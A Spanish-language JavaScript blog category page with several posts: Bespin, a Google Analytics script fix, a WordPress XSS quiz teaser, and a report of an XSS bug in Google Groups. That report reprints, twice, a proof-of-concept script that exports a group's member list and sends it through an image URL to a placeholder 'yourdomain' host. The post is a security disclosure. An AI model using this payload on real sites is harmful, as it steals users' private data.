Brendan Eich habla sobre ECMA y el Futuro de JavaScript.
Tags: brendan eich, ecma, JavaScript
Entradas en la categoría: JavaScript
Mozilla Bespin: Un editor de código basado en web
Bespin es un proyecto de un editor de código basado en web, libre, extensible que permitirá incrementar la productividad de desarrollo. Fue desarrollado usando HTML 5.
Por ahora está en fase de prueba en su versión 0.1, lo cual sólo permite el registro de usuarios mas no crear propios proyectos o archivos.
Obviamente en Firefox se ve bien, pero no funciona con IE7. El proyecto en si es interesante y novedoso, esperamos que en la siguiente versión ya se pueda jugar mas con este editor.
Introducing Bespin from Dion Almaer on Vimeo.
Enlace: Mozilla Labs: Bespin
Introducing Bespin from Dion Almaer on Vimeo.
Enlace: Mozilla Labs: Bespin
Otro bug, de la mano de Google
Este año recién empieza y ya se han reportado múltiples fallos de seguridad en diversas aplicaciones, esta vez Michael Schwarz comenta sobre un bug en Google Groups, que permite insertar javascript en el mensaje que se envía al administrador del grupo al momento de suscribirse.
En el mismo artículo, pone código de prueba que permite obtener la lista de miembros de un grupo X.
javascript:
<script type="text/javascript">
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/group/[GROUPNAME]/manage_members/MemberList.csv?Action.Export=Export+member+list", true);
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
var img = document.createElement("img");
img.src = "http://yourdomain/?" + escape(xmlhttp.responseText);
document.body.appendChild(img);
}
};
xmlhttp.send(null);
</script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/group/[GROUPNAME]/manage_members/MemberList.csv?Action.Export=Export+member+list", true);
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
var img = document.createElement("img");
img.src = "http://yourdomain/?" + escape(xmlhttp.responseText);
document.body.appendChild(img);
}
};
xmlhttp.send(null);
</script>
Filtro de datos – Solución
El código mostrado en el último quiz, en realidad es una función de Wordpress que era vulnerable a XSS. Pongo la solución en una nueva entrada porque intentaré describir algunos de los errores que cometí al intentar explotar el bug mencionado en una entrada anterior.
Seguir leyendo »
Google Analytics: urchinTracker is not defined
Muchos de los sitios que usan Google Analytics para manejar sus estadísticas, presentan un -pequeño- error en javascript cuando el visitante usa Firefox.
Para solucionar -realmente- este pequeño error, pueden usar una versión modificada del script de Google Analytics o cambiar lo siguiente para evitar que se muestre el error:
html:
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "....";
urchinTracker();
</script>
</script>
<script type="text/javascript">
_uacct = "....";
urchinTracker();
</script>
por:
html:
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "....";
if (typeof(urchinTracker) == 'function') {
urchinTracker();
}
</script>
</script>
<script type="text/javascript">
_uacct = "....";
if (typeof(urchinTracker) == 'function') {
urchinTracker();
}
</script>
